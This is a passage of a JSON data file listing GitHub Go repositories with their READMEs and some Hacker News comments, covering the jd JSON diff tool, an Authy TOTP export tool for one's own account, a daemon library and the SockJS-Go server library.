"readme_type": "markdown", "hn_comments": "Hi HN, this is a book with some programming exercises that I have been using on my classes so that students can get up-to speed with python.It is quite incomplete and with a lot of errors. Since my available time is short, and I'm not a native english speaker, this is the best result given the time available for it. I plan to include other things and correct the errors eventually.Have you tried https://www.amazon.com/Design-Patterns-Ruby-Russ-Olsen/dp/03...?Awesome! The one thing that turns me off a little is `ModTime`. I generally avoid incorporating modification times into my build (generally I force them to 1970), but a hash for the ETag would be very welcome.It's quite a common use-case to embed binary data into binaries, so I wonder why more languages don't directly support it with some sort of directive in source code.Interestingly the X Window System took the opposite approach for its images. Rather than making C accommodate their images, they made their images accommodate C! https://en.wikipedia.org/wiki/X_BitMap and https://en.wikipedia.org/wiki/X_PixMap are both image formats that consist of C code.One down side of this bundling approach is whenever there is a change in the static files you have to rebuild and restart app server.A friend of mine implemented something similar[1], but as a pre-processor for the source code. I'll be honest, it's very scary code but I thought it was interesting. :P[1]: https://github.com/sysr-q/assetsI'm not sure I understand how using ego ensures that it is fast. Could someone ELI5 please?The article doesn't explain why the author didn't contribute to one of the existing solutions to add the only feature they were missing.The better tool I know for this use case is fileb0x[1]. It work for all my needs, has some features that the alternatives lack.[1]: https://github.com/UnnoTed/fileb0x", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "josephburnett/jd", "link": "https://github.com/josephburnett/jd", "tags": ["diff", "json", "patch", "yaml"], "stars": 502, "description": "JSON diff and patch", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/josephburnett/jd)](https://goreportcard.com/report/josephburnett/jd)\n\n# JSON diff and patch\n\n`jd` is a commandline utility and Go library for diffing and patching JSON and YAML values. It supports a native `jd` format (similar to unified format) as well as JSON Merge Patch ([RFC 7386](https://datatracker.ietf.org/doc/html/rfc7386)) and a subset of JSON Patch ([RFC 6902](https://datatracker.ietf.org/doc/html/rfc6902)). Try it out at http://play.jd-tool.io/.\n\n![jd logo](logo_small.png)\n\n## Installation\n\nTo get the `jd` commandline utility:\n* run `brew install jd`, or\n* run `go install github.com/josephburnett/jd@latest`, or\n* visit https://github.com/josephburnett/jd/releases/latest and download the pre-built binary for your architecture/os, or\n* run in a Docker image `jd(){ docker run --rm -i -v $PWD:$PWD -w $PWD josephburnett/jd \"$@\"; }`.\n\nTo use the `jd` web UI:\n* visit http://play.jd-tool.io/, or\n* run `jd -port 8080` and visit http://localhost:8080.\n\n## Command line usage\n\n```\nUsage: jd [OPTION]... FILE1 [FILE2]\nDiff and patch JSON files.\n\nPrints the diff of FILE1 and FILE2 to STDOUT.\nWhen FILE2 is omitted the second input is read from STDIN.\nWhen patching (-p) FILE1 is a diff.\n\nOptions:\n -color Print color diff.\n -p Apply patch FILE1 to FILE2 or STDIN.\n -o=FILE3 Write to FILE3 instead of STDOUT.\n -set Treat arrays as sets.\n -mset Treat arrays as multisets (bags).\n -setkeys Keys to identify set objects\n -yaml Read and write YAML instead of JSON.\n -port=N Serve web UI on port N\n -f=FORMAT Produce diff in FORMAT \"jd\" (default), \"patch\" (RFC 6902) or\n \"merge\" (RFC 7386)\n -t=FORMATS Translate FILE1 between FORMATS. Supported formats are \"jd\",\n \"patch\" (RFC 6902), \"merge\" (RFC 7386), \"json\" and \"yaml\".\n FORMATS are provided as a pair separated by \"2\". E.g.\n \"yaml2json\" or \"jd2patch\".\n\nExamples:\n jd a.json b.json\n cat b.json | jd a.json\n jd -o patch a.json b.json; jd patch a.json\n jd -set a.json b.json\n jd -f patch a.json b.json\n jd -f merge a.json b.json\n```\n\n## Library usage\n\nNote: import only release commits (`v1.Y.Z`) because `master` can be unstable.\n\n```Go\nimport (\n\t\"fmt\"\n\tjd \"github.com/josephburnett/jd/lib\"\n)\n\nfunc ExampleJsonNode_Diff() {\n\ta, _ := jd.ReadJsonString(`{\"foo\":\"bar\"}`)\n\tb, _ := jd.ReadJsonString(`{\"foo\":\"baz\"}`)\n\tfmt.Print(a.Diff(b).Render())\n\t// Output:\n\t// @ [\"foo\"]\n\t// - \"bar\"\n\t// + \"baz\"\n}\n\nfunc ExampleJsonNode_Patch() {\n\ta, _ := jd.ReadJsonString(`[\"foo\"]`)\n\tdiff, _ := jd.ReadDiffString(`` +\n\t\t`@ [1]` + \"\\n\" +\n\t\t`+ \"bar\"` + \"\\n\")\n\tb, _ := a.Patch(diff)\n\tfmt.Print(b.Json())\n\t// Output:\n\t// [\"foo\",\"bar\"]\n}\n```\n\n## Diff language\n\n![Railroad diagram of EBNF](/ebnf.png)\n\n- A diff is zero or more sections\n- Sections start with a `@` header and the path to a node\n- A path is a JSON list of zero or more elements accessing collections\n- A JSON number element (e.g. `0`) accesses an array\n- A JSON string element (e.g. `\"foo\"`) accesses an object\n- An empty JSON object element (`{}`) accesses an array as a set or multiset\n- After the path is one or more removals or additions, removals first\n- Removals start with `-` and then the JSON value to be removed\n- Additions start with `+` and then the JSON value to added\n\n### EBNF\n\n```EBNF\nDiff ::= ( '@' '[' ( 'JSON String' | 'JSON Number' | 'Empty JSON Object' )* ']' '\\n' ( ( '-' 'JSON Value' '\\n' )+ | '+' 'JSON Value' '\\n' ) ( '+' 'JSON Value' '\\n' )* )*\n```\n\n### Examples\n\n```DIFF\n@ [\"a\"]\n- 1\n+ 2\n```\n\n```DIFF\n@ [2]\n+ {\"foo\":\"bar\"}\n```\n\n```DIFF\n@ [\"Movies\",67,\"Title\"]\n- \"Dr. Strangelove\"\n+ \"Dr. Evil Love\"\n@ [\"Movies\",67,\"Actors\",\"Dr. Strangelove\"]\n- \"Peter Sellers\"\n+ \"Mike Myers\"\n@ [\"Movies\",102]\n+ {\"Title\":\"Austin Powers\",\"Actors\":{\"Austin Powers\":\"Mike Myers\"}}\n```\n\n```DIFF\n@ [\"Movies\",67,\"Tags\",{}]\n- \"Romance\"\n+ \"Action\"\n+ \"Comedy\"\n```\n\n## Cookbook\n\n### Use git diff to produce a structural diff:\n```\ngit difftool -yx jd @ -- foo.json\n@ [\"foo\"]\n- \"bar\"\n+ \"baz\"\n```\n\n### See what changes in a Kubernetes Deployment:\n```\nkubectl get deployment example -oyaml > a.yaml\nkubectl edit deployment example\n# change cpu resource from 100m to 200m\nkubectl get deployment example -oyaml | jd -yaml a.yaml\n```\noutput:\n```diff\n@ [\"metadata\",\"annotations\",\"deployment.kubernetes.io/revision\"]\n- \"2\"\n+ \"3\"\n@ [\"metadata\",\"generation\"]\n- 2\n+ 3\n@ [\"metadata\",\"resourceVersion\"]\n- \"4661\"\n+ \"5179\"\n@ [\"spec\",\"template\",\"spec\",\"containers\",0,\"resources\",\"requests\",\"cpu\"]\n- \"100m\"\n+ \"200m\"\n@ [\"status\",\"conditions\",1,\"lastUpdateTime\"]\n- \"2021-12-23T09:40:39Z\"\n+ \"2021-12-23T09:41:49Z\"\n@ [\"status\",\"conditions\",1,\"message\"]\n- \"ReplicaSet \\\"nginx-deployment-787d795676\\\" has successfully progressed.\"\n+ \"ReplicaSet \\\"nginx-deployment-795c7f5bb\\\" has successfully progressed.\"\n@ [\"status\",\"observedGeneration\"]\n- 2\n+ 3\n```\napply these change to another deployment:\n```\n# edit file \"patch\" to contain only the hunk updating cpu request\nkubectl patch deployment example2 --type json --patch \"$(jd -t jd2patch ~/patch)\"\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hlandau/service", "link": "https://github.com/hlandau/service", "tags": ["daemonize", "dropping-privileges", "setproctitle"], "stars": 502, "description": ":zap: Easily write daemonizable services in Go", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alexzorin/authy", "link": "https://github.com/alexzorin/authy", "tags": ["authy", "totp", "golang"], "stars": 502, "description": "Go library and program to access your Authy TOTP secrets.", "lang": "Go", "repo_lang": "", "readme": "# authy\n\n\n[![GoDoc](https://godoc.org/github.com/alexzorin/authy?status.svg)](https://godoc.org/github.com/alexzorin/authy)\n\nThis is a Go library that allows you to access your [Authy](https://authy.com) TOTP tokens.\n\nIt was created to facilitate exports of your TOTP database, because Authy do not provide any way to access or port your TOTP tokens to another client.\n\nIt also somewhat documents Authy's protocol/encryption, since public materials on that are somewhat scarce.\n\nPlease be careful. You can get your Authy account suspended very easily by using this package. It does not hide itself or mimic the official clients.\n\n## Applications\n\n### authy-export\nThis program will enrol itself as an additional device on your Authy account and export all of your TOTP tokens in [Key URI Format](https://github.com/google/google-authenticator/wiki/Key-Uri-Format).\n\nIt is also able to save the TOTP database in a JSON file encrypted with your Authy backup password, which can be used for backup purposes, and to read it back in order to decrypt it.\n\n**Installation**\n\nPre-built binaries are available from the [releases page](https://github.com/alexzorin/authy/releases). (Windows binaries have been removed because of continual false positive virus complaints, sorry).\n\nAlternatively, it can be compiled from source, which requires [Go 1.12 or newer](https://golang.org/doc/install):\n\n```shell\ngo install github.com/alexzorin/authy/...@latest\n```\n\n**To use it:**\n\n1. Run `authy-export`\n2. The program will prompt you for your phone number country code (e.g. 1 for United States) and your phone number. This is the number that you used to register your Authy account originally.\n3. If the program identifies an existing Authy account, it will send a device registration request using the `push` method. This will send a push notification to your existing Authy apps (be it on Android, iOS, Desktop or Chrome), and you will need to respond that from your other app(s).\n4. If the device registration is successful, the program will save its authentication credential (a random value) to `$HOME/authy-go.json` for further uses. **Make sure to delete this file and de-register the device after you're finished.**\n5. If the program is able to fetch your TOTP encrypted database, it will prompt you for your Authy backup password. This is required to decrypt the TOTP secrets for the next step. \n6. The program will dump all of your TOTP tokens in URI format, which you can use to import to other applications.\n7. Alternatively, you can save the TOTP encrypted database to a file with the `--save` option, and reload it later with the `--load` option in order to decrypt it and dump the tokens.\n\nIf you [notice any missing TOTP tokens](https://github.com/alexzorin/authy/issues/1#issuecomment-516187701), please try toggling \"Authenticator Backups\" in your Authy settings, to force your backup to be resynchronized.\n\n**How do you then import it into another app?**\n\nUp to you, depends on the app. If the app uses QR scanning, you can try stick all the dumped URIs into a file (`tokens`) and then scan each QR code from your terminal, e.g.:\n\n```bash\n#!/usr/bin/env bash\ncat tokens | while IFS= read -r line; do\n clear\n echo -n \"$line\" | qrencode -t UTF8\n read -p $\"Press any key to continue\" key < /dev/tty\ndone\n```\n\n**\"My Twitch (or other site) token is different to the one I see in the Authy app?\"**\n\nThis is expected, depending on what the site is. \n\nIn Authy, there are two types of secrets:\n\n- **Tokens**: You sign up to a website, the website generates a TOTP secret, and you scan it via a QR code (in *any* app, not necessarily Authy). You can export that secret to other TOTP apps and the code will match.\n- **Apps**: The website has exported their TOTP flow to Authy's proprietary service, which requires you to use the Authy app. For sites like Twitch, Authy assigns a unique TOTP secret for every device you use the Authy app on. Each device will produce different 7-digit codes, but they will all work. If you deregister any device from your Authy account, that device's TOTP secrets will be revoked and its 7-digit codes will no longer work.\n\nTwitch (and a handful of other sites) are the latter: Authy Apps.\n\nNow, `authy-export` registers itself as a device on your Authy account. Per the explanation above, that means it is assigned a unique TOTP secret for sites like Twitch, which means it will generate different 7-digit codes to your primary Authy device. These codes will work as long as you don't deregister the `authy-export` device from your Authy account.\n\nThis is unfortunate, but the fact is: you cannot fully delete your Authy account if you want to keep using TOTP-based authentication with Twitch. If you do, all of the TOTP secrets will be revoked, and you will locked out of Twitch. It happened to me, and Twitch support chose to not help me out ^_^.\n\n**Batch support**\n\nWhen environment variable named `AUTHY_EXPORT_PASSWORD` exists, `authy-export` does not ask for a password and uses the variable instead. Use with care!\n\n## LICENSE\n\nSee [LICENSE](LICENSE)\n\n## Trademark Legal Notice\n\nAll product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "igm/sockjs-go", "link": "https://github.com/igm/sockjs-go", "tags": [], "stars": 501, "description": "WebSocket emulation - Go server library", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://api.travis-ci.org/igm/sockjs-go.svg?branch=master)](https://travis-ci.org/igm/sockjs-go) \n[![GoDoc](https://godoc.org/github.com/igm/sockjs-go/v3/sockjs?status.svg)](https://pkg.go.dev/github.com/igm/sockjs-go/v3/sockjs?tab=doc) \n[![Coverage Status](https://coveralls.io/repos/github/igm/sockjs-go/badge.svg?branch=master)](https://coveralls.io/github/igm/sockjs-go?branch=master)\n\nWhat is SockJS?\n=\n\nSockJS is a JavaScript library (for browsers) that provides a WebSocket-like\nobject. SockJS gives you a coherent, cross-browser, Javascript API\nwhich creates a low latency, full duplex, cross-domain communication\nchannel between the browser and the web server, with WebSockets or without.\nThis necessitates the use of a server, which this is one version of, for GO.\n\n\nSockJS-Go server library\n=\n\nSockJS-Go is a [SockJS](https://github.com/sockjs/sockjs-client) server library written in Go.\n\nFor latest **v3** version of `sockjs-go` use:\n\n github.com/igm/sockjs-go/v3/sockjs\n\nFor **v2** version of `sockjs-go` use:\n\n gopkg.in/igm/sockjs-go.v2/sockjs\n\nUsing version **v1** is not recommended (DEPRECATED)\n\n gopkg.in/igm/sockjs-go.v1/sockjs\n\nNote: using `github.com/igm/sockjs-go/sockjs` is not recommended. It exists for backwards compatibility reasons and is not maintained. \n\nVersioning\n-\n\nSockJS-Go project adopted [gopkg.in](http://gopkg.in) approach for versioning. SockJS-Go library details can be found [here](https://gopkg.in/igm/sockjs-go.v2/sockjs)\n\nWith the introduction of go modules a new version `v3` is developed and maintained in the `master` and has new import part `github.com/igm/sockjs-go/v3/sockjs`. \n\nExample\n-\n\nA simple echo sockjs server:\n\n\n```go\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/igm/sockjs-go/v3/sockjs\"\n)\n\nfunc main() {\n\thandler := sockjs.NewHandler(\"/echo\", sockjs.DefaultOptions, echoHandler)\n\tlog.Fatal(http.ListenAndServe(\":8081\", handler))\n}\n\nfunc echoHandler(session sockjs.Session) {\n\tfor {\n\t\tif msg, err := session.Recv(); err == nil {\n\t\t\tsession.Send(msg)\n\t\t\tcontinue\n\t\t}\n\t\tbreak\n\t}\n}\n```\n\n\nSockJS Protocol Tests Status\n-\nSockJS defines a set of [protocol tests](https://github.com/sockjs/sockjs-protocol) to quarantee a server compatibility with sockjs client library and various browsers. SockJS-Go server library aims to provide full compatibility, however there are couple of tests that don't and probably will never pass due to reasons explained in table below:\n\n\n| Failing Test | Explanation |\n| -------------| ------------|\n| **XhrPolling.test_transport** | does not pass due to a feature in net/http that does not send content-type header in case of StatusNoContent response code (even if explicitly set in the code), [details](https://code.google.com/p/go/source/detail?r=902dc062bff8) |\n| **WebSocket.** | Sockjs Go version supports RFC 6455, draft protocols hixie-76, hybi-10 are not supported |\n| **JSONEncoding** | As menioned in [browser quirks](https://github.com/sockjs/sockjs-client#browser-quirks) section: \"it's advisable to use only valid characters. Using invalid characters is a bit slower, and may not work with SockJS servers that have a proper Unicode support.\" Go lang has a proper Unicode support |\n| **RawWebsocket.** | The sockjs protocol tests use old WebSocket client library (hybi-10) that does not support RFC 6455 properly |\n\nWebSocket\n-\nAs mentioned above sockjs-go library is compatible with RFC 6455. That means the browsers not supporting RFC 6455 are not supported properly. There are no plans to support draft versions of WebSocket protocol. The WebSocket support is based on [Gorilla web toolkit](http://www.gorillatoolkit.org/pkg/websocket) implementation of WebSocket.\n\nFor detailed information about browser versions supporting RFC 6455 see this [wiki page](http://en.wikipedia.org/wiki/WebSocket#Browser_support).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}], "_init_fingerprint": "da39a3ee5e6b4b0d3255bfef95601890afd80709"}